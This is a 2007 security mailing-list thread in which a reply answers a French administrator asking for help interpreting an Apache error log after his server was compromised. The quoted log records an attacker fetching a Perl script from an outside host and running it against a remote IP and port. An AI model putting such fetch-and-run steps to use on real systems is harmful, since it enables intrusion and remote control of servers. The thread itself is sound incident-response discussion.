Security Basics mailing list archives
Re: Analys of an apache log following a hack.
From: Santiago Barahona <sant-bar () dsv su se>
Date: Wed, 11 Apr 2007 08:13:51 +0200
Salut Greg,Please correct me if I am wrong: If there was a buffer overflow in your Apache server you would normally see a laaaarge string of none- sense characters in the log...
What about the MaxClients setting?... wouldn't that be a trace of a DoS?Did you take a look at the perl script that it is downloading?? (http://r00ting.org/b)
Why don't you make a search on the vulnerabilities for your specific configuration... OS, DB, Apache version?. That might give you a good point to start looking.
regards, santiago On 10 Apr 07, at 12:11, Gregory Boddin wrote: Hello, it's my first mail to the security focus mailing list. First thanks for this community and your attention.Well my server was hacked 1 week ago, and I find that in the apache error_log.
The system was cleaned after that but I want to know more about this.I think that someone have used a buffer overflow in httpd (apache) server.
Confirm that? Thank you very much for answer. (excuse my english because I m french) [APACHE ERROR LOG][Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@*****.be(48): unable to execute /usr/sbin/ postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36-- http://www.r00ting.org/b => `b' Resolving www.r00ting.org... 200.226.246.22 Connecting to www.r00ting.org|200.226.246.22|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,606 (27K) [text/plain]0K .......... .......... ...... 100% 41.93 KB/s
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 5315 0 0:00:05 0:00:05 --:--:-- 72383
sh: lynx: command not found sh: fetch: command not found --00:22:32-- http://www.r00ting.org/b => `b' Resolving www.r00ting.org... 200.226.246.22 Connecting to www.r00ting.org|200.226.246.22|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,606 (27K) [text/plain]0K .......... .......... ...... 100% 58.23 KB/s
00:22:34 (58.23 KB/s) - `b' saved [27606/27606]% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 33291 0 --:--:-- --:--:-- --:--:-- 60817
sh: lynx: command not found sh: fetch: command not found Undefined subroutine &main::getnick called at b line 304.sh: line 1: 5148 Killed perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations [Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory sh: /cd: No such file or directorysendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/ postdrop -r: Success
sh: /cd: No such file or directory sh: /cd: No such file or directory sh: /cd: No such file or directory[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not exit, sending a SIGTERM [Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not exit, sending a SIGTERM [Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal operations [Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/ postdrop -r: Success
sendmail: fatal: No recipient addresses found in message headersendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/ postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal operations [Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/ postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal operations [Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
[/APACHE ERROR LOG] Thank you. Greg
Current thread:
- Analys of an apache log following a hack. Gregory Boddin (Apr 10)
- Re: Analys of an apache log following a hack. Santiago Barahona (Apr 11)